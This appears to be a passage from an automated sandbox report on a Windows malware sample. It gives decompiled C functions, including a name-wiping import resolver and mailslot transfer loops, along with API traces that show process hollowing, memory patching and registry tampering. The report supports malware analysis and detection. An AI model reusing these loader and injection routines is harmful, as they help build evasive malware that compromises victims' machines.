							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}
APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}
APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				/* Import resolver for an image mapped at __edi; _a4 points at the
				   IMAGE_NT_HEADERS32 (+0x80 = import directory RVA, +0x50 = SizeOfImage).
				   Each DLL name and function name is zeroed with memset as soon as it has
				   been handed to LoadLibraryA / GetProcAddress, so the resolved import
				   names do not survive in the memory image. Returns 0 on success,
				   0x7e (ERROR_MOD_NOT_FOUND) if a DLL fails to load and
				   0x7f (ERROR_PROC_NOT_FOUND) if a function cannot be resolved. */
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t11;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80)); // import directory RVA
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi; // first IMAGE_IMPORT_DESCRIPTOR
				_t23 =  *((intOrPtr*)(_t34 + 0xc)); // descriptor Name RVA
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44)); // wipe the DLL name once it has been loaded
					_t27 =  *_t34; // OriginalFirstThunk
					_t35 =  *((intOrPtr*)(_t34 + 0x10)); // FirstThunk (the IAT)
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20)); // Name RVA of the next descriptor (0x14 + 0xc)
							_t34 = _t34 + 0x14; // sizeof(IMAGE_IMPORT_DESCRIPTOR)
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42; // distance from the name thunk table to the IAT
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) { // outside [base, base + SizeOfImage)
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2: skip the Hint word of IMAGE_IMPORT_BY_NAME
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49)); // wipe the function name once it has been resolved
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4; // write the resolved address into the IAT slot
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f; // ERROR_PROC_NOT_FOUND
						goto L19;
					}
					_t27 = _t35; // no OriginalFirstThunk: walk the IAT itself
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e; // ERROR_MOD_NOT_FOUND
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				/* Reads the contents of the mailslot \\.\mailslot\msl0 into a heap buffer
				   that grows in 0x1000-byte steps; on success the buffer pointer is stored
				   at _a4+4 and the received length at _a4+8. Returns 0, 8
				   (ERROR_NOT_ENOUGH_MEMORY) or the GetLastError() value. The decompiler
				   names the mailslot handle _v16 where it is stored and _v20 where it is
				   read back; that stack-slot aliasing is left as recovered. */
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;
				void* _t41;

				_pop(_t41);
				_t39 = 0; // bytes received so far
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0); // max message size 0x1000, read timeout 0
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000); // heap allocation helper (RtlAllocateHeap, see APIs below)
					if(_t36 == 0) {
						L10:
						_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) { // ERROR_SEM_TIMEOUT: no message yet, keep polling
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000; // grow the buffer by one more chunk
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed; 100 ms between polls
						} while (_v16 == 0x1000); // a short read ends the message
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36; // received data
					 *((intOrPtr*)(_t27 + 8)) = _t39; // received length
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
